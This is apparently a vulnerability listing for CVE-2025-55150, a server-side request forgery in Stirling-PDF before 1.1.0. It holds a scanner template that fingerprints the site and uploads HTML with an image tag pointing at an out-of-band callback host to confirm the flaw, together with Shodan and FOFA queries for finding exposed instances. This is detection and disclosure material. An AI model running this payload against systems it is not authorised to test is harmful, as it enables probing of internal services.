CVE-2025-55150: Stirling-PDF < 1.1.0 - Server-Side Request Forgery

2026-04-09 Stirling-PDF PoC Public

Description

Stirling-PDF < 1.1.0 contains a server side request forgery caused by bypassing the sanitizer in the /api/v1/convert/html/pdf endpoint when processing HTML to PDF conversion, letting attackers perform SSRF, exploit requires local access.

PoC

id: CVE-2025-55150

info:
  name: Stirling-PDF < 1.1.0 - Server-Side Request Forgery
  author: WeQi
  severity: high
  description: |
    Stirling-PDF < 1.1.0 contains a server side request forgery caused by bypassing the sanitizer in the /api/v1/convert/html/pdf endpoint when processing HTML to PDF conversion, letting attackers perform SSRF, exploit requires local access.
  impact: |
    Attackers can perform SSRF to access internal resources or services, potentially leading to information disclosure or further attacks.
  remediation: |
   Upgrade to version 1.1.0 or later.
  reference:
    - https://github.com/Stirling-Tools/Stirling-PDF/security/advisories/GHSA-xw8v-9mfm-g2pm
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55150
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-55150
    epss-score: 0.01687
    epss-percentile: 0.75878
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 2
    vendor: stirlingpdf
    product: stirling_pdf
    fofa-query: title="Stirling PDF"
    shodan-query: http.title:"Stirling PDF"
  tags: cve,cve2025,stirling-pdf,ssrf

variables:
  username: "{{to_lower(rand_base(6))}}"

flow: http(1) && http(2)

http:

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<title>Stirling PDF")'
        internal: true

  - raw:
      - |
        POST /api/v1/convert/html/pdf HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryavCUaFmKmcDEhMPU

        ------WebKitFormBoundaryavCUaFmKmcDEhMPU
        Content-Disposition: form-data; name="fileInput"; filename="{{username}}.html"
        Content-Type: text/html

        <marquee behavior='alternate' direction='right'><img src='http://{{interactsh-url}}'></marquee>
        Content-Disposition: form-data; name="zoom"

        1
        ------WebKitFormBoundaryavCUaFmKmcDEhMPU--

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(body,'%PDF-1.7')"
        condition: and
# digest: 4b0a00483046022100e8986a80133717ee8f52a3fc153b11cb33d83731c5d3fb436457b4dd37eabcb302210095aa6d843cfa75aa7faa014910a66b7cc835be280760d7eb8d022b626e120797:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities